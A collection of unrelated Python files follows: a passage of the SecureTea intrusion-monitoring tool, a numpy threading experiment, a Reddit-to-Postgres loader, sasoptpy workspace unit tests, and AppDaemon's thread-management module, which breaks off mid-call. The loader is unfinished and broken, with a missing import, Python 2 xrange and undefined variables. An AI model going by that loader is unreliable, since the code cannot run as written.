debug=self.cred['debug'])
ids_obj.start_ids()
except KeyError:
self.logger.log(
"Intrusion Detection System (IDS) parameter not configured.",
logtype="error"
)
if self.system_log_provided:
try:
sys_obj = engine.SystemLogEngine(debug=self.cred['debug'])
sys_obj.run()
except Exception as e:
self.logger.log(
"Error occured: " + str(e),
logtype="error"
)
if self.server_log_provided:
server_cred = self.cred['server_log']
try:
server_obj = SecureTeaServerLog(debug=self.cred['debug'],
log_type=server_cred['log-type'],
log_file=server_cred['log-file'],
window=server_cred['window'],
ip_list=server_cred['ip-list'],
status_code=server_cred['status-code'])
server_obj.run()
except KeyError:
self.logger.log(
"Server Log parameters not configured.",
logtype="error"
)
except Exception as e:
self.logger.log(
"Error occured: " + str(e),
logtype="error"
)
if self.auto_server_patcher_provided:
auto_server_patcher_cred = self.cred['auto_server_patcher']
try:
patcher_obj = SecureTeaAutoServerPatcher(debug=self.cred['debug'],
cred=auto_server_patcher_cred)
patcher_obj.start()
except KeyError:
self.logger.log(
"Auto Server Patcher parameters not configured.",
logtype="error"
)
except Exception as e:
self.logger.log(
"Error occured: " + str(e),
logtype="error"
)
if self.web_deface_provided:
web_deface = self.cred['web_deface']
try:
web_deface_obj = WebDeface(debug=self.cred['debug'],
path=web_deface['path'],
server_name=web_deface['server-name'])
web_deface_obj.start()
except KeyError:
self.logger.log(
"Web Deface Detection parameters not configured.",
logtype="error"
)
except Exception as e:
self.logger.log(
"Error occured: " + str(e),
logtype="error"
)
if self.antivirus_provided:
antivirus = self.cred['antivirus']
try:
antivirus_obj = SecureTeaAntiVirus(debug=self.cred['debug'], cred=antivirus)
antivirus_obj.start()
except KeyError:
self.logger.log(
"AntiVirus parameters not configured.",
logtype="error"
)
except Exception as e:
self.logger.log(
"Error occured: " + str(e),
logtype="error"
)
if self.iot_checker_provided:
try:
iot_checker_obj = iot_checker.IoTChecker(debug=self.cred['debug'],
api_key=self.cred['iot-check']['shodan-api-key'],
ip=self.cred['iot-check']['ip'])
iot_checker_obj.check_shodan_range()
except KeyError:
self.logger.log(
"IoT checker parameters not configured.",
logtype="error"
)
except Exception as e:
self.logger.log(
"Error occured: " + str(e),
logtype="error"
)
def send_notif(self, msg):
"""Send notification through
the available mediums.
Args:
msg (str): Message to send
Raises:
None
Returns:
None
"""
# Send a warning message via twitter account
if self.twitter_provided:
self.twitter.notify(msg)
# Send a warning message via telegram bot
if self.telegram_provided:
self.telegram.notify(msg)
# Send a warning message via twilio account
if self.twilio_provided:
self.twilio.notify(msg)
# Send a warning message via slack bot app
if self.slack_provided:
self.slack.notify(msg)
# Send a warning message via aws ses bot3 app
if self.aws_ses_provided:
self.aws_ses.notify(msg)
# Send a warning message via Gmail
if self.gmail_provided:
self.gmail_obj.notify(msg)
def on_move(self, x, y):
"""
Log warning on terminal & send notification
on mouse movement.
Args:
x (TYPE): X - mouse position
y (TYPE): y - mouse position
Raises:
None
Returns:
bool (False): Stop the listener
"""
self.logger.log('Pointer moved to {0}'.format((x, y)))
msg = '(' + str(self.alert_count) + \
') : Someone has accessed your computer'
# Shows the warning msg on the console
self.logger.log(msg, logtype="warning")
# Send message notification to available platforms
self.send_notif(msg)
# Update counter for the next move
self.alert_count += 1
self.logger.log("The program will sleep for 10 seconds")
time.sleep(10)
# Ready to monitor the next move
self.logger.log("Ready to monitor further movement .. !!")
# Stop the listener
return False
@staticmethod
def get_mouse_event():
"""Get mouse event.
Args:
None
Raises:
None
Returns:
x (int): X - mouse position
y (int): y - mouse position
"""
with open("/dev/input/mice", "rb") as fh:
buf = fh.read(3)
x, y = struct.unpack("bb", buf[1:])
return x, y
def get_by_mice(self):
"""Detect intrusion by watching mouse coordinates.
Args:
None
Raises:
None
Returns:
None
"""
posx = 0
posy = 0
while(1):
x, y = self.get_mouse_event()
posx = posx + x
posy = posy + y
if (posx > 100 or posy > 100 or posx < -100 or posy < -100):
posx = 0
posy = 0
self.on_move(posx, posy)
def on_user_update(self):
"""
Send updates regarding the users currently logged in to the system
to various platforms.
"""
msg = self.userLogger.log()
if msg == "USERS UPDATES\n":
self.logger.log("NO NEW USERS DETECTED")
return
# Shows the warning msg on the console
self.logger.log(msg, logtype="warning")
# Send message notification to available platforms
self.send_notif(msg)
return
def run_mouse_notifs(self):
"""Run methods for notification using mice activity"""
time.sleep(10)
try:
if not pynput_status:
self.get_by_mice()
else:
while 1:
# Starting mouse event listner
with mouse.Listener(on_move=self.on_move) as listener:
listener.join()
except Exception as e:
self.logger.log(
"Something went wrong: " + str(e) + " End of program",
logtype="error"
)
except KeyboardInterrupt as e:
self.logger.log(
"You pressed Ctrl+C!, Bye")
exit()
def run_user_notifs(self):
"""Run methods for notification of users added or removed"""
try:
from securetea import users
self.userLogger = users.SecureTeaUserLogger(self.cred['debug'])
if not pynput_status:
self.get_by_mice()
else:
while 1:
# Starting user notifs
self.on_user_update()
time.sleep(10)
except Exception as e:
self.logger.log(
"Something went wrong: " + str(e) + " End of program",
logtype="error"
)
except KeyboardInterrupt as e:
self.logger.log(
"You pressed Ctrl+C!, Bye")
exit()
def run(self):
"""
Track mouse activity & SSH users on
different threads.
Args:
None
Raises:
None
Returns:
None
"""
try:
t1 = threading.Thread(target=self.run_mouse_notifs)
t2 = threading.Thread(target=self.run_user_notifs)
t2.start()
t1.start()
except Exception as e:
self.logger.log(
"Something went wrong: " + str(e) + " End of program",
logtype="error"
)
except KeyboardInterrupt as e:
self.logger.log(
"You pressed Ctrl+C!, Bye")
exit()
|
multit.py
|
import time, threading
import numpy as np
# 假定这是你的银行存款:
start = time.time()
x = 128
balance = np.zeros([x,x,x])
def change_it(i,j,k):
# 先存后取,结果应该为0:
global balance
balance[i,j,k] = i*25+j*5+k
# balance = balance - n
def run_thread(n):
for i in range(n):
for j in range(n):
for k in range(n):
print(i,j,k)
change_it(i,j,k)
#t1 = threading.Thread(target=run_thread, args=(x,))
#t1.start()
#t1.join()
run_thread(x)
print(balance)
end = time.time()
print(end-start)
#from multiprocessing import Pool
#import os, time, random
#
#
#
#def long_time_task(i,j,k):
# return i*25+j*5+k
#
#if __name__=='__main__':
# print('Parent process %s.' % os.getpid())
## index = []
# xx = []
# p = Pool(4)
# for i in range(5):
# for j in range(5):
# for k in range(5):
# r = p.apply_async(long_time_task, args=(i,j,k))
# xx.append([i,j,k,r])
## index.append(i)
#
# print('Waiting for all subprocesses done...')
## p.close()
## p.join(1)
#
# print('All subprocesses done.')
# flux = np.zeros([5,5,5])
#
## a = np.asarray(xx)
## flux[a[:,0],a[:,1],a[:,2]] = a[:,3]
# for n in xx:
# flux[n[0],n[1],n[2]] = n[3].get()
|
PopulateRedditDB.py
|
from multiprocessing import Process, Manager
import time
import itertools
import sys,getopt,json, csv
class Config:
def __init__(self, corpus, dbhost, dbname, dbuser, dbpassword, threads, subredditid):
self.corpus = corpus
self.dbhost = dbhost
self.dbname = dbname
self.dbuser = dbuser
self.dbpassword = dbpassword
self.threads = threads
self.subredditid = subredditid
def __str__(self):
return self.corpus + ',' + self.dbhost + ',' + self.dbname + ',' + self.dbuser + ',' + self.dbpassword + "," + self.threads + ',' + self.subredditid
def connprep(self):
return 'dbname=' + self.dbname + ' user=' + self.dbuser + ' host=' + self.dbhost + ' password=' + self.dbpassword
class Post:
def __init__(self,post):
#do work
return
def __str__(self):
return "self"
def ReturnInsert(self):
return "INSERT into Posts ()"
def insert(config, line):
p = Post(line)
if p.subredditid == config.subredditid:
p.ReturnInsert
conn = psycopg2.connect(c.connprep())
cursor = conn.cursor()
cursor.execute(p.ReturnInsert)
cursor.close()
connection.commit()
else:
return
def LoadIntoDB(config):
pool = []
manager = Manager()
work = manager.Queue(config.threads)
for i in xrange(config.threads):
p = Process(target=insert, args=(config, line))
p.start()
pool.append(p)
with open(config.corpus) as f:
iters = itertools.chain(f, (None,)*config.threads)
for line in enumerate(iters):
work.put(line)
for p in pool:
p.join()
def GetConfig(filename,threads,subredditid):
config = list(open(filename))[0].split(',')
return Config(config[0], config[1], config[2], config[3], config[4], threads, subredditid)
if __name__ == '__main__':
threads = ''
subredditid = ''
config = ''
try:
opts, args = getopt.getopt(sys.argv[1:],"t:s:c:h")
except getopt.GetoptError:
print('PopulateDB.py -t <threads> -s <subredditid> -c <config>')
sys.exit(2)
for opt, arg in opts:
if opt == '-h':
print('PopulateDB.py -t <threads> -s <subredditid> -c <config>')
sys.exit()
elif opt in ("-t"):
threads = arg
elif opt in ("-s"):
subredditid = arg
elif opt in ("-c"):
config = arg
LoadIntoDB(GetConfig(config, threads,subredditid))
|
test_workspace.py
|
#!/usr/bin/env python
# encoding: utf-8
#
# Copyright SAS Institute
#
# Licensed under the Apache License, Version 2.0 (the License);
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
Unit tests for workspaces.
"""
import os
import unittest
import warnings
from inspect import cleandoc
from swat import CAS, SWATError
import sasoptpy as so
from tests.swat_config import create_cas_connection
class TestWorkspace(unittest.TestCase):
"""
Unit tests for the :class:`sasoptpy.Workspace` objects
"""
@classmethod
def setUpClass(cls):
so.reset()
cls.conn = None
try:
cls.conn = create_cas_connection()
except SWATError:
warnings.warn('CAS connection is not available', RuntimeWarning)
except TypeError:
warnings.warn('CAS variables are not available', RuntimeWarning)
@classmethod
def tearDownClass(cls):
if cls.conn is not None:
cls.conn.close()
def setUp(self):
so.reset()
def test_vg_in_session(self):
with so.Workspace('w') as w:
x = so.VariableGroup(4, name='x')
x[2].set_bounds(lb=1)
x[3].set_init(5)
self.assertEqual(so.to_optmodel(w), cleandoc('''
proc optmodel;
var x {{0,1,2,3}};
x[3] = 5;
x[2].lb = 1;
quit;'''))
def test_attributes(self):
with so.Workspace('w') as w:
S = so.Set(name='S')
x = so.Variable(name='x')
y = so.VariableGroup(4, name='y')
z = so.VariableGroup(S, name='z')
d = so.Variable(name='d')
e = so.Variable(name='d')
t = so.VariableGroup(2, name='t')
u = so.VariableGroup(2, name='t')
self.assertIn('Workspace[ID', str(w))
self.assertEqual('sasoptpy.Workspace(w)', repr(w))
w.set_session(None)
self.assertEqual(w.get_session(), None)
self.assertIs(x, w.get_variable('x'))
self.assertIs(y, w.get_variable('y'))
self.assertIs(z[0], w.get_variable('z[0]'))
def warn_duplicate():
w.get_variable('d')
self.assertWarns(UserWarning, warn_duplicate)
def warn_duplicate_vg():
w.get_variable('t')
self.assertWarns(UserWarning, warn_duplicate_vg)
w.set_variable_value('z[0]', 1)
self.assertEqual(z[0].get_value(), 1)
self.assertEqual(w.get_variable('a'), None)
def test_var_values(self):
if TestWorkspace.conn is None:
self.skipTest('CAS session is not available')
from sasoptpy.actions import solve
with so.Workspace('test_var_vals', session=TestWorkspace.conn) as w:
S = so.Set(name='S', value=[1, 2, 3])
x = so.Variable(name='x', lb=1, ub=4)
y = so.VariableGroup(S, name='y', ub=7)
z = so.VariableGroup(2, name='z', ub=2)
o = so.Objective(x+y[1]+y[2]+y[3]+z[0], name='obj', sense=so.MAX)
solve()
w.submit(verbose=True)
self.assertEqual(so.to_optmodel(w), cleandoc('''
proc optmodel;
set S = {1,2,3};
var x >= 1 <= 4;
var y {{S}} <= 7;
var z {{0,1}} <= 2;
max obj = x + y[1] + y[2] + y[3] + z[0];
solve;
quit;'''))
self.assertEqual(x.get_value(), 4)
self.assertEqual(y[1].get_value(), 7)
self.assertEqual(z[0].get_value(), 2)
def test_ws_parsing(self):
if TestWorkspace.conn is None:
self.skipTest('CAS session is not available')
from sasoptpy.actions import solve, drop, print_item
from math import inf
with so.Workspace('test_ws_parsing', session=TestWorkspace.conn)\
as w:
x = so.Variable(name='x')
y = so.Variable(name='y', vartype=so.INT, lb=-inf)
o = so.Objective(x**2-4*x+4, sense=so.MIN, name='obj')
c1 = so.Constraint(x <= 1, name='c1')
c2 = so.Constraint(x == 3*y, name='c2')
s1 = solve(options={'with': so.BLACKBOX})
p1 = print_item(x)
drop(c1)
s2 = so.LiteralStatement('solve with blackbox;')
p2 = so.LiteralStatement('print y;')
self.assertEqual(so.to_optmodel(w), cleandoc('''
proc optmodel;
var x;
var y integer;
min obj = (x) ^ (2) - 4 * x + 4;
con c1 : x <= 1;
con c2 : x - 3 * y = 0;
solve with blackbox;
print x;
drop c1;
solve with blackbox;
print y;
quit;'''))
w.submit()
self.assertEqual(x.get_value(), 3)
print(s1.get_problem_summary().to_string())
self.assertEqual(s1.get_problem_summary().to_string(), cleandoc('''
Problem Summary
Value
Label
Objective Sense Minimization
Objective Function obj
Objective Type Quadratic
Number of Variables 2
Bounded Above 0
Bounded Below 0
Bounded Below and Above 0
Free 2
Fixed 0
Binary 0
Integer 1
Number of Constraints 2
Linear LE (<=) 1
Linear EQ (=) 1
Linear GE (>=) 0
Linear Range 0
Constraint Coefficients 3'''))
self.assertEqual(p1.get_response().to_string(), cleandoc('''
x
x
0 0.0'''))
self.assertEqual(p2.get_response().to_string(), cleandoc('''
y
y
0 1.0'''))
def test_multithread_workspace(self):
import time
from threading import Thread
def create_workspace(i):
with so.Workspace(f'w{i}') as w:
self.assertEqual(so.container, w)
print('Start workspace: {}'.format(w.name))
time.sleep(1)
print('Exit workspace: {}'.format(w.name))
return i
threads = []
for j in [1, 2, 3]:
t = Thread(target=create_workspace, args=(j,))
threads.append(t)
t.start()
for thread in threads:
thread.join()
print(threads)
|
threading.py
|
import asyncio
import threading
import datetime
from queue import Queue
from random import randint
import re
import sys
import traceback
import inspect
from datetime import timedelta
import logging
import functools
import iso8601
from appdaemon import utils as utils
from appdaemon.appdaemon import AppDaemon
class Threading:
def __init__(self, ad: AppDaemon, kwargs):
self.AD = ad
self.kwargs = kwargs
self.logger = ad.logging.get_child("_threading")
self.diag = ad.logging.get_diag()
self.thread_count = 0
self.threads = {}
# A few shortcuts
self.add_entity = ad.state.add_entity
self.get_state = ad.state.get_state
self.set_state = ad.state.set_state
self.add_to_state = ad.state.add_to_state
self.add_to_attr = ad.state.add_to_attr
self.auto_pin = True
self.pin_threads = 0
self.total_threads = 0
# Setup stats
self.current_callbacks_executed = 0
self.current_callbacks_fired = 0
self.last_stats_time = datetime.datetime(1970, 1, 1, 0, 0, 0, 0)
self.callback_list = []
async def get_q_update(self):
for thread in self.threads:
qsize = self.get_q(thread).qsize()
await self.set_state("_threading", "admin", "thread.{}".format(thread), q=qsize)
async def get_callback_update(self):
now = datetime.datetime.now()
self.callback_list.append(
{
"fired": self.current_callbacks_fired,
"executed": self.current_callbacks_executed,
"ts": now
})
if len(self.callback_list) > 10:
self.callback_list.pop(0)
fired_sum = 0
executed_sum = 0
for item in self.callback_list:
fired_sum += item["fired"]
executed_sum += item["executed"]
total_duration = (self.callback_list[len(self.callback_list) -1]["ts"] - self.callback_list[0]["ts"]).total_seconds()
if total_duration == 0:
fired_avg = 0
executed_avg = 0
else:
fired_avg = round(fired_sum / total_duration, 1)
executed_avg = round(executed_sum / total_duration, 1)
await self.set_state("_threading", "admin", "sensor.callbacks_average_fired", state=fired_avg)
await self.set_state("_threading", "admin", "sensor.callbacks_average_executed", state=executed_avg)
self.last_stats_time = now
self.current_callbacks_executed = 0
self.current_callbacks_fired = 0
async def init_admin_stats(self):
# Initialize admin stats
await self.add_entity("admin", "sensor.callbacks_total_fired", 0)
await self.add_entity("admin", "sensor.callbacks_average_fired", 0)
await self.add_entity("admin", "sensor.callbacks_total_executed", 0)
await self.add_entity("admin", "sensor.callbacks_average_executed", 0)
await self.add_entity("admin", "sensor.threads_current_busy", 0)
await self.add_entity("admin", "sensor.threads_max_busy", 0)
await self.add_entity("admin", "sensor.threads_max_busy_time", utils.dt_to_str(datetime.datetime(1970, 1, 1, 0, 0, 0, 0)))
await self.add_entity("admin", "sensor.threads_last_action_time", utils.dt_to_str(datetime.datetime(1970, 1, 1, 0, 0, 0, 0)))
async def create_initial_threads(self):
kwargs = self.kwargs
if "threads" in kwargs:
self.logger.warning(
"Threads directive is deprecated apps - will be pinned. Use total_threads if you want to unpin your apps")
if "total_threads" in kwargs:
self.total_threads = kwargs["total_threads"]
self.auto_pin = False
else:
apps = await self.AD.app_management.check_config(True, False)
self.total_threads = int(apps["active"])
self.pin_apps = True
utils.process_arg(self, "pin_apps", kwargs)
if self.pin_apps is True:
self.pin_threads = self.total_threads
else:
self.auto_pin = False
self.pin_threads = 0
if "total_threads" not in kwargs:
self.total_threads = 10
utils.process_arg(self, "pin_threads", kwargs, int=True)
if self.pin_threads > self.total_threads:
raise ValueError("pin_threads cannot be > total_threads")
if self.pin_threads < 0:
raise ValueError("pin_threads cannot be < 0")
self.logger.info("Starting Apps with %s workers and %s pins", self.total_threads, self.pin_threads)
self.next_thread = self.pin_threads
self.thread_count = 0
for i in range(self.total_threads):
await self.add_thread(True)
# Add thread object to track async
await self.add_entity("admin", "thread.async", "idle",
{
"q": 0,
"is_alive": True,
"time_called": utils.dt_to_str(datetime.datetime(1970, 1, 1, 0, 0, 0, 0)),
"pinned_apps": []
}
)
def get_q(self, thread_id):
return self.threads[thread_id]["queue"]
@staticmethod
def atoi(text):
return int(text) if text.isdigit() else text
def natural_keys(self, text):
return [self.atoi(c) for c in re.split('(\d+)', text)]
# Diagnostics
def total_q_size(self):
qsize = 0
for thread in self.threads:
qsize += self.threads[thread]["queue"].qsize()
return qsize
def min_q_id(self):
id = 0
i = 0
qsize = sys.maxsize
for thread in self.threads:
if self.threads[thread]["queue"].qsize() < qsize:
qsize = self.threads[thread]["queue"].qsize()
id = i
i += 1
return id
async def get_thread_info(self):
info = {}
info["max_busy_time"] = await self.get_state("_threading", "admin", "sensor.threads_max_busy_time")
info["last_action_time"] = await self.get_state("_threading", "admin", "sensor.threads_last_action_time")
info["current_busy"] = await self.get_state("_threading", "admin", "sensor.threads_current_busy")
info["max_busy"] = await self.get_state("_threading", "admin", "sensor.threads_max_busy")
info["threads"] = {}
for thread in sorted(self.threads, key=self.natural_keys):
if thread not in info["threads"]:
info["threads"][thread] = {}
t = await self.get_state("_threading", "admin", "thread.{}".format(thread), attribute="all")
info["threads"][thread]["time_called"] = t["attributes"]["time_called"]
info["threads"][thread]["callback"] = t["state"]
info["threads"][thread]["is_alive"] = t["attributes"]["is_alive"]
return info
async def dump_threads(self):
self.diag.info("--------------------------------------------------")
self.diag.info("Threads")
self.diag.info("--------------------------------------------------")
current_busy = await self.get_state("_threading", "admin", "sensor.threads_current_busy")
max_busy = await self.get_state("_threading", "admin", "sensor.threads_max_busy")
max_busy_time = utils.str_to_dt(await self.get_state("_threading", "admin", "sensor.threads_max_busy_time"))
last_action_time = await self.get_state("_threading", "admin", "sensor.threads_last_action_time")
self.diag.info("Currently busy threads: %s", current_busy)
self.diag.info("Most used threads: %s at %s", max_busy, max_busy_time)
self.diag.info("Last activity: %s", last_action_time)
self.diag.info("Total Q Entries: %s", self.total_q_size())
self.diag.info("--------------------------------------------------")
for thread in sorted(self.threads, key=self.natural_keys):
t = await self.get_state("_threading", "admin", "thread.{}".format(thread), attribute="all")
print("thread.{}".format(thread), t)
self.diag.info(
"%s - qsize: %s | current callback: %s | since %s, | alive: %s, | pinned apps: %s",
thread,
t["attributes"]["q"],
t["state"],
t["attributes"]["time_called"],
t["attributes"]["is_alive"],
await self.get_pinned_apps(thread)
)
self.diag.info("--------------------------------------------------")
#
# Thread Management
#
def select_q(self, args):
#
# Select Q based on distribution method:
# Round Robin
# Random
# Load distribution
#
# Check for pinned app and if so figure correct thread for app
if args["pin_app"] is True:
thread = args["pin_thread"]
# Handle the case where an App is unpinned but selects a pinned callback without specifying a thread
# If this happens a lot, thread 0 might get congested but the alternatives are worse!
if thread == -1:
self.logger.warning("Invalid thread ID for pinned thread in app: %s - assigning to thread 0", args["name"])
thread = 0
else:
if self.thread_count == self.pin_threads:
raise ValueError("pin_threads must be set lower than threads if unpinned_apps are in use")
if self.AD.load_distribution == "load":
thread = self.min_q_id()
elif self.AD.load_distribution == "random":
thread = randint(self.pin_threads, self.thread_count - 1)
else:
# Round Robin is the catch all
thread = self.next_thread
self.next_thread += 1
if self.next_thread == self.thread_count:
self.next_thread = self.pin_threads
if thread < 0 or thread >= self.thread_count:
raise ValueError("invalid thread id: {} in app {}".format(thread, args["name"]))
id = "thread-{}".format(thread)
q = self.threads[id]["queue"]
q.put_nowait(args)
async def check_overdue_and_dead_threads(self):
if self.AD.sched.realtime is True and self.AD.thread_duration_warning_threshold != 0:
for thread_id in self.threads:
if self.threads[thread_id]["thread"].is_alive() is not True:
self.logger.critical("Thread %s has died", thread_id)
self.logger.critical("Pinned apps were: %s", await self.get_pinned_apps(thread_id))
self.logger.critical("Thread will be restarted")
id=thread_id.split("-")[1]
await self.add_thread(silent=False, pinthread=False, id=id)
if await self.get_state("_threading", "admin", "thread.{}".format(thread_id)) != "idle":
start = utils.str_to_dt(await self.get_state("_threading", "admin", "thread.{}".format(thread_id), attribute="time_called"))
dur = (await self.AD.sched.get_now() - start).total_seconds()
if dur >= self.AD.thread_duration_warning_threshold and dur % self.AD.thread_duration_warning_threshold == 0:
self.logger.warning("Excessive time spent in callback: %s - %s",
await self.get_state("_threading", "admin", "thread.{}".format(thread_id), attribute="callback")
, dur)
async def check_q_size(self, warning_step, warning_iterations):
totalqsize = 0
for thread in self.threads:
totalqsize += self.threads[thread]["queue"].qsize()
if totalqsize > self.AD.qsize_warning_threshold:
if (warning_step == 0 and warning_iterations >= self.AD.qsize_warning_iterations) or warning_iterations == self.AD.qsize_warning_iterations:
for thread in self.threads:
qsize = self.threads[thread]["queue"].qsize()
if qsize > 0:
self.logger.warning("Queue size for thread %s is %s, callback is '%s' called at %s - possible thread starvation",
thread, qsize,
await self.get_state("_threading", "admin", "thread.{}".format(thread)),
iso8601.parse_date(await self.get_state("_threading", "admin", "thread.{}".format(thread), attribute="time_called"))
)
await self.dump_threads()
warning_step = 0
warning_step += 1
warning_iterations += 1
if warning_step >= self.AD.qsize_warning_step:
warning_step = 0
else:
warning_step = 0
warning_iterations = 0
return warning_step, warning_iterations
async def update_thread_info(self, thread_id, callback, app, type, uuid):
self.logger.debug("Update thread info: %s", thread_id)
if self.AD.log_thread_actions:
if callback == "idle":
self.diag.info(
"%s done", thread_id)
else:
self.diag.info(
"%s calling %s callback %s", thread_id, type, callback)
now = await self.AD.sched.get_now()
if callback == "idle":
start = utils.str_to_dt(await self.get_state("_threading", "admin", "thread.{}".format(thread_id), attribute="time_called"))
if self.AD.sched.realtime is True and (now - start).total_seconds() >= self.AD.thread_duration_warning_threshold:
self.logger.warning("callback %s has now completed", await self.get_state("_threading", "admin", "thread.{}".format(thread_id)))
await self.add_to_state("_threading", "admin", "sensor.threads_current_busy", -1)
await self.add_to_attr("_threading", "admin", "app.{}".format(app), "callbacks", 1)
await self.add_to_attr("_threading", "admin", "{}_callback.{}".format(type, uuid), "executed", 1)
await self.add_to_state("_threading", "admin", "sensor.callbacks_total_executed", 1)
self.current_callbacks_executed += 1
else:
await self.add_to_state("_threading", "admin", "sensor.threads_current_busy", 1)
self.current_callbacks_fired += 1
current_busy = await self.get_state("_threading", "admin", "sensor.threads_current_busy")
max_busy = await self.get_state("_threading", "admin", "sensor.threads_max_busy")
if current_busy > max_busy:
await self.set_state("_threading", "admin", "sensor.threads_max_busy" , state=current_busy)
await self.set_state("_threading", "admin", "sensor.threads_max_busy_time", state=utils.dt_to_str((await self.AD.sched.get_now()).replace(microsecond=0), self.AD.tz))
await self.set_state("_threading", "admin", "sensor.threads_last_action_time", state=utils.dt_to_str((await self.AD.sched.get_now()).replace(microsecond=0), self.AD.tz))
# Update thread info
if thread_id == "async":
await self.set_state("_threading", "admin", "thread.{}".format(thread_id),
q=0,
state=callback,
time_called=utils.dt_to_str(now.replace(microsecond=0), self.AD.tz),
is_alive=True,
pinned_apps=[]
)
else:
await self.set_state("_threading", "admin", "thread.{}".format(thread_id),
q=self.threads[thread_id]["queue"].qsize(),
state=callback,
time_called=utils.dt_to_str(now.replace(microsecond=0), self.AD.tz),
is_alive=self.threads[thread_id]["thread"].is_alive(),
pinned_apps=await self.get_pinned_apps(thread_id)
)
await self.set_state("_threading", "admin", "app.{}".format(app), state=callback)
#
# Pinning
#
async def add_thread(self, silent=False, pinthread=False, id=None):
if id is None:
tid = self.thread_count
else:
tid = id
if silent is False:
self.logger.info("Adding thread %s", tid)
t = threading.Thread(target=self.worker)
t.daemon = True
name = "thread-{}".format(tid)
t.setName(name)
if id is None:
await self.add_entity("admin", "thread.{}".format(name), "idle",
{
"q": 0,
"is_alive": True,
"time_called": utils.dt_to_str(datetime.datetime(1970, 1, 1, 0, 0, 0, 0)),
}
)
self.threads[name] = {}
self.threads[name]["queue"] = Queue(maxsize=0)
t.start()
self.thread_count += 1
if pinthread is True:
self.pin_threads += 1
else:
await self.set_state("_threading", "admin", "thread.{}".format(name), state="idle", is_alive=True)
self.threads[name]["thread"] = t
async def calculate_pin_threads(self):
if self.pin_threads == 0:
return
thread_pins = [0] * self.pin_threads
for name in self.AD.app_management.objects:
# Looking for apps that already have a thread pin value
if await self.get_app_pin(name) and await self.get_pin_thread(name) != -1:
thread = await self.get_pin_thread(name)
if thread >= self.thread_count:
raise ValueError("Pinned thread out of range - check apps.yaml for 'pin_thread' or app code for 'set_pin_thread()'")
# Ignore anything outside the pin range as it will have been set by the user
if thread < self.pin_threads:
thread_pins[thread] += 1
# Now we know the numbers, go fill in the gaps
for name in self.AD.app_management.objects:
if await self.get_app_pin(name) and await self.get_pin_thread(name) == -1:
thread = thread_pins.index(min(thread_pins))
await self.set_pin_thread(name, thread)
thread_pins[thread] += 1
for thread in self.threads:
pinned_apps = await self.get_pinned_apps(thread)
await self.set_state("_threading", "admin", "thread.{}".format(thread), pinned_apps=pinned_apps)
def app_should_be_pinned(self, name):
# Check apps.yaml first - allow override
app = self.AD.app_management.app_config[name]
if "pin_app" in app:
return app["pin_app"]
# if not, go with the global default
return self.pin_apps
async def get_app_pin(self, name):
return self.AD.app_management.objects[name]["pin_app"]
async def set_app_pin(self, name, pin):
self.AD.app_management.objects[name]["pin_app"] = pin
if pin is True:
# May need to set this app up with a pinned thread
await self.calculate_pin_threads()
async def get_pin_thread(self, name):
return self.AD.app_management.objects[name]["pin_thread"]
async def set_pin_thread(self, name, thread):
self.AD.app_management.objects[name]["pin_thread"] = thread
def validate_pin(self, name, kwargs):
valid = True
if "pin_thread" in kwargs:
if kwargs["pin_thread"] < 0 or kwargs["pin_thread"] >= self.thread_count:
self.logger.warning("Invalid value for pin_thread (%s) in app: %s - discarding callback", kwargs["pin_thread"], name)
valid = False
return valid
async def get_pinned_apps(self, thread):
id = int(thread.split("-")[1])
apps = []
for obj in self.AD.app_management.objects:
if self.AD.app_management.objects[obj]["pin_thread"] == id:
apps.append(obj)
return apps
#
# Constraints
#
async def check_constraint(self, key, value, app):
unconstrained = True
if key in app.list_constraints():
method = getattr(app, key)
unconstrained = await utils.run_in_executor(self, method, value)
return unconstrained
async def check_time_constraint(self, args, name):
unconstrained = True
if "constrain_start_time" in args or "constrain_end_time" in args:
if "constrain_start_time" not in args:
start_time = "00:00:00"
else:
start_time = args["constrain_start_time"]
if "constrain_end_time" not in args:
end_time = "23:59:59"
else:
end_time = args["constrain_end_time"]
if await self.AD.sched.now_is_between(start_time, end_time, name) is False:
unconstrained = False
return unconstrained
async def check_days_constraint(self, args, name):
unconstrained = True
if "constrain_days" in args:
days = args["constrain_days"]
now = await self.AD.sched.get_now()
daylist = []
for day in days.split(","):
daylist.append(await utils.run_in_executor(self, utils.day_of_week, day))
if now.weekday() not in daylist:
unconstrained = False
return unconstrained
#
# Workers
#
async def check_and_dispatch_state(self, name, funcref, entity, attribute, new_state,
old_state, cold, cnew, kwargs, uuid_, pin_app, pin_thread):
executed = False
#kwargs["handle"] = uuid_
#
#
#
if attribute == "all":
executed = await self.dispatch_worker(name, {
"id": uuid_,
"name": name,
"objectid": self.AD.app_management.objects[name]["id"],
"type": "state",
"function": funcref,
"attribute": attribute,
"entity": entity,
"new_state": new_state,
"old_state": old_state,
"pin_app": pin_app,
"pin_thread": pin_thread,
"kwargs": kwargs,
})
else:
#
# Let's figure out if we need to run a callback
#
# Start by figuring out what the incoming old value was
#
if old_state is None:
old = None
else:
if attribute in old_state:
old = old_state[attribute]
elif 'attributes' in old_state and attribute in old_state['attributes']:
old = old_state['attributes'][attribute]
else:
old = None
#
# Now the incoming new value
#
if new_state is None:
new = None
else:
if attribute in new_state:
new = new_state[attribute]
elif 'attributes' in new_state and attribute in new_state['attributes']:
new = new_state['attributes'][attribute]
else:
new = None
#
# Don't do anything unless there has been a change
#
if new != old:
if "__duration" in kwargs:
#
# We have a pending timer for this, but we are coming around again.
# Either we will start a new timer if the conditions are met
# Or we won't if they are not.
# Either way, we cancel the old timer
#
await self.AD.sched.cancel_timer(name, kwargs["__duration"])
#
# Check if we care about the change
#
if (cold is None or cold == old) and (cnew is None or cnew == new):
#
# We do!
#
if "duration" in kwargs:
#
# Set a timer
#
exec_time = await self.AD.sched.get_now() + timedelta(seconds=int(kwargs["duration"]))
#
# If it's a oneshot, scheduler will delete the callback once it has executed,
# We need to give it the handle so it knows what to delete
#
if kwargs.get("oneshot", False):
kwargs["__handle"] = uuid_
#
# We're not executing the callback immediately so let's schedule it
# Unless we intercede and cancel it, the callback will happen in "duration" seconds
#
kwargs["__duration"] = await self.AD.sched.insert_schedule(
name, exec_time, funcref, False, None,
__entity=entity,
__attribute=attribute,
__old_state=old,
__new_state=new, **kwargs
)
else:
#
# Not a delay so make the callback immediately
#
executed = await self.dispatch_worker(name, {
"id": uuid_,
